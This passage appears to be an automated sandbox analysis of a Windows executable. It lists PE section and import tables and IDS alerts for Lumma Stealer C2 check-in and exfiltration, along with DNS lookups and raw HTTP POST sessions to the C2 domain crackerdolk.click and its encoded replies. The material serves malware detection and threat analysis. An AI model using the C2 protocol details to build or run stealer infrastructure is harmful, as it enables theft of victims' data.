                                       .rsrc | 0x100000 | 0xca6e | 0xcc00 | 569ff95b5331009a26662c9b5ac1038a | False | 0.8082490808823529 | data | 7.091824152592848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .reloc | 0x10d000 | 0xfd6 | 0x1000 | cef0a100e30ec9765bca61f09a3e76d1 | False | 0.569580078125 | data | 5.3244841607782325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                       RT_ICON | 0x100298 | 0x6502 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006187640188724
                                       RT_ICON | 0x10679c | 0x1e44 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0014197212183789
                                       RT_ICON | 0x1085e0 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.45779088689991865
                                       RT_ICON | 0x10ac48 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.4972677595628415
                                       RT_ICON | 0x10bd70 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5815602836879432
                                       RT_DIALOG | 0x10c1d8 | 0x100 | data | English | United States | 0.5234375
                                       RT_DIALOG | 0x10c2d8 | 0x11c | data | English | United States | 0.6056338028169014
                                       RT_DIALOG | 0x10c3f4 | 0x60 | data | English | United States | 0.7291666666666666
                                       RT_GROUP_ICON | 0x10c454 | 0x4c | data | English | United States | 0.8026315789473685
                                       RT_VERSION | 0x10c4a0 | 0x2f8 | data | English | United States | 0.45
                                       RT_MANIFEST | 0x10c798 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                       DLL | Import
                                       KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                       USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                       GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                       SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                       ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                       COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                       ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                       VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T09:13:23.312130+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:24.069083+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:24.069083+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:25.381207+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49733 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:26.175399+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49733 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:26.175399+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49733 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:27.757910+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49738 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:29.923164+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49744 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:32.201365+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49750 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:34.733711+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49756 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:36.787090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49762 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:37.598789+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49762 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:39.138807+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49768 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:39.142379+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49768 | 104.21.80.1 | 443 | TCP
2024-12-28T09:13:41.715508+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49779 | 104.21.80.1 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 09:12:58.816972971 CET | 51855 | 53 | 192.168.2.5 | 1.1.1.1
Dec 28, 2024 09:12:59.041115046 CET | 53 | 51855 | 1.1.1.1 | 192.168.2.5
Dec 28, 2024 09:13:21.723227024 CET | 54623 | 53 | 192.168.2.5 | 1.1.1.1
Dec 28, 2024 09:13:22.042922020 CET | 53 | 54623 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 09:12:58.816972971 CET | 192.168.2.5 | 1.1.1.1 | 0x36d6 | Standard query (0) | yHUkiJhYyguIo.yHUkiJhYyguIo | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:21.723227024 CET | 192.168.2.5 | 1.1.1.1 | 0xfd3c | Standard query (0) | crackerdolk.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 09:12:59.041115046 CET | 1.1.1.1 | 192.168.2.5 | 0x36d6 | Name error (3) | yHUkiJhYyguIo.yHUkiJhYyguIo | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:13:22.042922020 CET | 1.1.1.1 | 192.168.2.5 | 0xfd3c | No error (0) | crackerdolk.click | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
                                      • crackerdolk.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:13:23 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: crackerdolk.click
2024-12-28 08:13:23 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 08:13:24 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:13:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j0rjkmonljqcj7424l37pu85mk; expires=Wed, 23 Apr 2025 02:00:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2GQNLPxn7MvfCZEm%2FeB9mj8LhR3eGqTr5gM9c2%2Fd6vNNHWoxHLJYft3DtqZmI%2FI7KW94k9PeAw5TyFZn%2BlGgUQ%2FnjeDhkdmXroDtp5SyHKVz6VZpYf8ARPF4ls0%2BUJiw5qrXw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f90173e6f93c46b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1585&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1842271&cwnd=226&unsent_bytes=0&cid=6118aae26758b997&ts=767&x=0"
2024-12-28 08:13:24 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 08:13:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.5 | 49733 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:25 UTC | 265 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 76
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:25 UTC | 76 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 33 26 6a 3d 35 66 38 33 61 37 35 66 62 37 30 33 33 31 32 39 64 65 34 35 62 34 30 33 32 38 35 61 36 37 32 33
                                      Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--l3&j=5f83a75fb7033129de45b403285a6723
                                      2024-12-28 08:13:26 UTC | 1131 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=eq00gg79i63q028t8o2usor3j4; expires=Wed, 23 Apr 2025 02:00:04 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48AccNOyrXu8toZdV95aKgsDAgI10ZORYyD9p6DYjf8%2BzoCQsfD4vz4HRjZ27JBFrLRgQHFtrglNhOMDhdA3Wdp%2B3LUhcDYFiUTygi7HYwvvhlAAodl9%2BXFkt5MfKD%2B8WjvYqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f90174b68ef7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1982&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=977&delivery_rate=1443400&cwnd=195&unsent_bytes=0&cid=e0a47e2e335f16bc&ts=799&x=0"
                                      2024-12-28 08:13:26 UTC | 238 | IN | Data Raw: 31 34 38 32 0d 0a 67 4e 70 48 72 47 52 47 50 61 31 4b 57 41 72 52 64 56 31 56 59 72 69 47 63 58 39 42 4e 2f 54 70 5a 4c 62 75 47 52 34 4f 41 52 50 37 2b 44 47 4f 58 6e 49 52 6a 7a 6b 39 4b 4f 73 42 4c 79 41 48 6c 4b 51 51 47 32 4d 4e 6b 6f 67 49 78 59 73 31 50 48 68 73 4d 62 71 38 4a 73 41 58 49 78 47 50 4c 79 41 6f 36 79 34 6d 64 77 66 57 70 45 74 64 4a 46 32 57 69 41 6a 55 6a 33 4a 78 66 6d 31 77 36 4c 59 67 78 41 45 6c 57 63 77 6d 4e 57 2b 30 45 44 77 2f 44 4e 48 72 47 52 4a 6a 47 39 61 4d 48 70 54 55 4f 31 4e 72 64 58 4c 4e 75 7a 54 48 52 6a 73 52 31 6d 67 39 5a 50 4e 50 66 7a 51 48 32 75 6f 58 47 79 70 66 6e 49 45 41 31 59 70 7a 62 6d 64 6e 65 2b 69 34 49 38 55 4c 4c 45 33 42 4c 44 4a 6b 73 68 6f 38
                                      Data Ascii: 1482gNpHrGRGPa1KWArRdV1VYriGcX9BN/TpZLbuGR4OARP7+DGOXnIRjzk9KOsBLyAHlKQQG2MNkogIxYs1PHhsMbq8JsAXIxGPLyAo6y4mdwfWpEtdJF2WiAjUj3Jxfm1w6LYgxAElWcwmNW+0EDw/DNHrGRJjG9aMHpTUO1NrdXLNuzTHRjsR1mg9ZPNPfzQH2uoXGypfnIEA1Ypzbmdne+i4I8ULLE3BLDJksho8
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 64 30 36 61 34 77 74 64 65 78 58 46 75 51 58 46 6e 57 35 78 66 47 55 78 2f 66 59 38 6a 67 45 6f 48 35 64 6f 4d 6d 53 39 45 6a 77 34 42 39 76 6b 41 52 49 6a 56 70 36 44 41 74 36 44 64 48 4e 69 61 58 62 71 73 53 4c 42 41 53 78 5a 77 43 74 36 4a 76 4d 51 4a 33 64 59 6d 73 51 44 48 69 42 42 6d 35 70 47 79 38 4a 69 50 47 74 76 4d 62 72 34 49 38 41 48 4b 56 2f 64 49 44 46 6a 74 67 55 30 50 67 33 58 35 42 34 58 4c 46 61 57 6a 41 7a 65 67 33 46 34 59 57 35 33 34 72 68 6c 67 45 59 6a 52 34 39 77 65 6b 75 32 42 7a 67 37 46 70 6a 65 55 77 4a 74 54 4e 61 4d 43 70 54 55 4f 33 52 70 59 48 4c 70 74 79 62 47 44 54 5a 66 33 53 34 33 62 61 45 52 4f 6a 6b 4b 32 66 59 5a 45 79 56 57 6e 34 41 50 30 59 74 2f 50 43 49 6a 64 76 72 34 66 59 34 6e 4b 56 54 44 49 69 31 6f 38 77 68
                                      Data Ascii: d06a4wtdexXFuQXFnW5xfGUx/fY8jgEoH5doMmS9Ejw4B9vkARIjVp6DAt6DdHNiaXbqsSLBASxZwCt6JvMQJ3dYmsQDHiBBm5pGy8JiPGtvMbr4I8AHKV/dIDFjtgU0Pg3X5B4XLFaWjAzeg3F4YW534rhlgEYjR49weku2Bzg7FpjeUwJtTNaMCpTUO3RpYHLptybGDTZf3S43baEROjkK2fYZEyVWn4AP0Yt/PCIjdvr4fY4nKVTDIi1o8wh
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 76 59 66 46 79 56 61 6d 34 64 47 6d 73 78 38 5a 43 77 37 4d 63 69 37 4d 63 30 4d 5a 6d 72 4d 4a 6a 52 76 70 56 63 67 65 52 6d 61 34 78 39 64 65 78 57 62 69 67 37 53 6e 6e 52 78 62 32 31 2f 37 62 30 71 78 67 59 6b 55 73 6f 73 4d 57 4f 77 47 6a 73 6c 43 74 72 73 46 68 77 70 58 39 62 46 52 74 4f 55 4f 79 51 73 55 6d 62 70 2b 68 44 4e 43 43 70 59 32 57 67 6c 4a 71 70 58 4f 44 74 41 67 71 51 65 46 53 5a 51 6d 59 6f 4d 32 6f 6c 78 63 47 52 74 63 76 43 33 49 63 34 4b 4c 46 58 43 4a 6a 35 67 75 68 77 30 4d 51 44 62 37 6c 4e 54 59 31 4b 4f 79 31 36 55 75 48 78 77 59 57 77 7a 31 37 73 72 77 41 45 79 48 39 42 6d 49 79 69 30 47 33 39 76 51 4e 62 74 45 78 59 70 55 5a 61 4d 43 39 47 50 66 48 39 68 5a 48 76 73 76 79 48 43 44 79 6c 5a 7a 79 38 2b 62 61 45 53 4e 6a 73 4d
                                      Data Ascii: vYfFyVam4dGmsx8ZCw7Mci7Mc0MZmrMJjRvpVcgeRma4x9dexWbig7SnnRxb21/7b0qxgYkUsosMWOwGjslCtrsFhwpX9bFRtOUOyQsUmbp+hDNCCpY2WglJqpXODtAgqQeFSZQmYoM2olxcGRtcvC3Ic4KLFXCJj5guhw0MQDb7lNTY1KOy16UuHxwYWwz17srwAEyH9BmIyi0G39vQNbtExYpUZaMC9GPfH9hZHvsvyHCDylZzy8+baESNjsM
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 74 6a 53 74 69 53 52 74 4f 41 4f 79 51 73 61 6e 6a 77 74 69 76 48 43 79 4a 58 79 43 59 33 59 37 55 63 4f 44 41 47 31 2b 77 65 47 43 42 55 6b 6f 45 55 31 34 64 78 63 57 59 6a 50 36 4b 2f 50 59 35 65 5a 48 6a 44 41 53 70 7a 6f 51 46 2f 4b 45 37 44 70 42 51 52 59 77 33 57 69 41 6e 64 67 33 4e 30 59 32 78 31 37 4c 34 6a 77 77 4d 72 56 64 30 67 4e 47 57 34 47 44 51 6c 41 4e 66 67 48 78 6b 72 58 70 7a 4c 53 4a 53 4c 59 7a 77 30 49 30 54 76 74 79 58 4e 45 47 52 41 67 54 46 36 62 37 39 58 5a 33 63 4d 31 4f 51 63 45 53 39 65 6e 6f 6f 4b 32 6f 74 2b 64 57 52 72 59 2b 4f 38 4c 63 38 49 4b 31 37 4c 4c 54 39 73 74 42 4d 35 4f 45 43 55 70 42 51 46 59 77 33 57 70 43 48 68 7a 6c 70 47 4c 48 77 2f 2b 2f 67 69 77 6b 5a 38 48 38 4d 72 4e 6d 43 38 45 54 59 37 43 74 50 76 48
                                      Data Ascii: tjStiSRtOAOyQsanjwtivHCyJXyCY3Y7UcODAG1+weGCBUkoEU14dxcWYjP6K/PY5eZHjDASpzoQF/KE7DpBQRYw3WiAndg3N0Y2x17L4jwwMrVd0gNGW4GDQlANfgHxkrXpzLSJSLYzw0I0TvtyXNEGRAgTF6b79XZ3cM1OQcES9enooK2ot+dWRrY+O8Lc8IK17LLT9stBM5OECUpBQFYw3WpCHhzlpGLHw/+/giwkZ8H8MrNmC8ETY7CtPvH
                                      2024-12-28 08:13:26 UTC | 913 | IN | Data Raw: 56 6a 77 50 62 6a 58 70 36 66 6d 52 34 38 4c 59 6f 77 51 34 73 56 73 34 73 50 32 57 31 47 7a 55 32 42 39 54 71 47 31 31 74 46 5a 47 54 52 6f 7a 4d 57 6d 78 33 63 57 66 76 6d 53 6a 42 52 6a 73 52 31 6d 67 39 5a 50 4e 50 66 7a 34 53 33 75 6b 42 46 43 52 62 6d 59 67 55 31 59 46 77 62 6d 74 73 64 65 57 30 49 38 45 41 4a 56 72 46 4a 44 31 74 75 42 67 7a 64 30 36 61 34 77 74 64 65 78 57 34 67 42 58 44 6a 33 56 33 65 6e 67 78 2f 66 59 38 6a 67 45 6f 48 35 64 6f 4f 57 4f 34 45 7a 38 37 41 4e 37 70 45 77 38 73 55 70 47 43 44 63 61 47 66 48 74 6e 61 33 72 74 76 6a 66 43 43 44 5a 61 33 54 70 36 4a 76 4d 51 4a 33 64 59 6d 74 49 55 44 54 4e 57 31 4c 6f 51 31 35 70 77 63 57 41 6a 62 71 79 68 5a 63 6b 4b 5a 41 65 50 4c 6a 56 68 73 42 67 2b 50 67 7a 58 34 52 6f 59 49 6c
                                      Data Ascii: VjwPbjXp6fmR48LYowQ4sVs4sP2W1GzU2B9TqG11tFZGTRozMWmx3cWfvmSjBRjsR1mg9ZPNPfz4S3ukBFCRbmYgU1YFwbmtsdeW0I8EAJVrFJD1tuBgzd06a4wtdexW4gBXDj3V3engx/fY8jgEoH5doOWO4Ez87AN7pEw8sUpGCDcaGfHtna3rtvjfCCDZa3Tp6JvMQJ3dYmtIUDTNW1LoQ15pwcWAjbqyhZckKZAePLjVhsBg+PgzX4RoYIl
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 33 61 65 35 0d 0a 67 6a 78 41 49 6e 56 73 77 76 4d 32 36 34 46 44 55 34 42 39 7a 67 45 78 59 6b 57 35 43 4f 44 64 33 4d 4e 54 78 72 65 7a 47 36 2b 41 50 74 46 44 5a 74 77 53 73 68 4b 4b 78 5a 4a 6e 63 48 31 71 52 4c 58 53 68 64 6d 5a 6b 44 33 59 52 2f 64 57 78 6e 65 2b 2b 2f 4a 63 73 4c 49 56 76 42 4c 44 31 6f 76 78 67 34 50 77 2f 65 35 42 78 64 62 52 57 52 6b 30 61 4d 7a 46 74 33 65 6b 4a 2f 36 61 70 6c 30 55 67 39 48 38 67 6b 65 6a 44 7a 47 54 59 32 43 4e 54 6f 47 78 6b 78 56 5a 32 43 43 64 57 44 65 33 39 74 61 58 6e 77 76 69 58 46 44 69 4e 58 79 79 59 6f 61 62 78 58 63 58 63 48 77 71 52 4c 58 52 4a 44 6b 59 77 4a 6c 71 56 38 5a 32 31 70 63 75 6d 30 5a 64 46 49 50 52 2f 49 4a 48 6f 77 38 78 6f 7a 4f 67 54 49 36 42 4d 64 4b 6c 4b 63 6d 51 6e 62 67 58 68
                                      Data Ascii: 3ae5gjxAInVswvM264FDU4B9zgExYkW5CODd3MNTxrezG6+APtFDZtwSshKKxZJncH1qRLXShdmZkD3YR/dWxne++/JcsLIVvBLD1ovxg4Pw/e5BxdbRWRk0aMzFt3ekJ/6apl0Ug9H8gkejDzGTY2CNToGxkxVZ2CCdWDe39taXnwviXFDiNXyyYoabxXcXcHwqRLXRJDkYwJlqV8Z21pcum0ZdFIPR/IJHow8xozOgTI6BMdKlKcmQnbgXh
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 2f 43 35 4c 38 49 48 49 31 6a 45 4f 6a 46 36 75 42 38 38 4f 51 6a 54 35 42 30 64 49 6c 69 57 79 30 69 55 69 32 4d 38 4e 43 4e 55 77 61 38 7a 78 45 51 48 53 4e 6b 69 50 57 53 6c 48 44 34 30 46 74 66 30 55 31 4e 6a 52 4a 47 61 52 6f 79 61 61 32 74 72 66 44 2f 37 2b 43 4c 43 52 6e 77 66 78 43 63 30 5a 62 67 54 4e 6a 49 49 32 65 45 57 46 79 39 5a 6c 34 4d 50 33 6f 6c 2b 65 6d 5a 67 66 2b 32 35 4b 63 6f 50 4b 6c 61 50 5a 6e 70 76 71 31 64 6e 64 7a 62 4b 34 77 73 51 4d 78 65 6b 69 42 66 46 6d 58 5a 73 61 69 46 65 34 62 51 6d 79 77 45 30 48 39 42 6d 49 79 69 30 47 33 39 76 51 4e 72 67 48 78 34 6b 57 35 6d 47 43 64 4f 48 64 48 5a 69 63 58 37 6e 73 43 6e 47 43 7a 5a 56 78 54 6f 7a 59 62 34 5a 4e 79 55 44 6d 71 70 54 47 6a 73 56 7a 73 73 30 33 6f 39 33 61 6d 46 73
                                      Data Ascii: /C5L8IHI1jEOjF6uB88OQjT5B0dIliWy0iUi2M8NCNUwa8zxEQHSNkiPWSlHD40Ftf0U1NjRJGaRoyaa2trfD/7+CLCRnwfxCc0ZbgTNjII2eEWFy9Zl4MP3ol+emZgf+25KcoPKlaPZnpvq1dndzbK4wsQMxekiBfFmXZsaiFe4bQmywE0H9BmIyi0G39vQNrgHx4kW5mGCdOHdHZicX7nsCnGCzZVxTozYb4ZNyUDmqpTGjsVzss03o93amFs
                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 6e 77 4f 44 46 63 77 53 59 39 66 71 4a 58 63 58 63 50 6d 72 77 71 58 57 73 56 71 63 56 47 7a 4d 77 6a 50 46 6c 67 66 2b 79 2f 4d 39 39 4c 42 46 54 5a 4b 54 64 6a 76 31 55 2b 4f 68 44 64 70 46 31 64 4a 52 58 4f 32 30 69 55 69 47 6f 38 4e 44 4d 6a 75 65 31 32 6d 56 5a 32 51 49 45 78 65 6e 37 7a 54 32 31 35 51 4d 69 6b 53 31 31 6b 56 6f 53 5a 41 4e 65 61 65 44 74 53 58 56 48 70 74 43 62 43 42 79 4d 66 67 57 67 31 4b 4f 73 75 66 7a 51 53 79 4b 73 43 43 79 35 46 6b 63 63 4f 78 59 46 33 50 43 49 6a 50 65 61 7a 4b 63 73 42 4e 42 44 64 4f 44 46 6b 70 56 73 37 4a 55 43 55 70 41 49 57 4c 45 65 59 6a 45 6e 46 6d 6e 5a 73 62 32 5a 32 72 72 41 30 77 77 70 6b 45 59 38 39 4d 57 53 31 47 69 70 34 45 63 7a 6e 42 52 70 76 58 59 65 47 43 70 53 7a 4e 54 78 30 49 79 6d 69 6a
                                      Data Ascii: nwODFcwSY9fqJXcXcPmrwqXWsVqcVGzMwjPFlgf+y/M99LBFTZKTdjv1U+OhDdpF1dJRXO20iUiGo8NDMjue12mVZ2QIExen7zT215QMikS11kVoSZANeaeDtSXVHptCbCByMfgWg1KOsufzQSyKsCCy5FkccOxYF3PCIjPeazKcsBNBDdODFkpVs7JUCUpAIWLEeYjEnFmnZsb2Z2rrA0wwpkEY89MWS1Gip4EcznBRpvXYeGCpSzNTx0Iymij
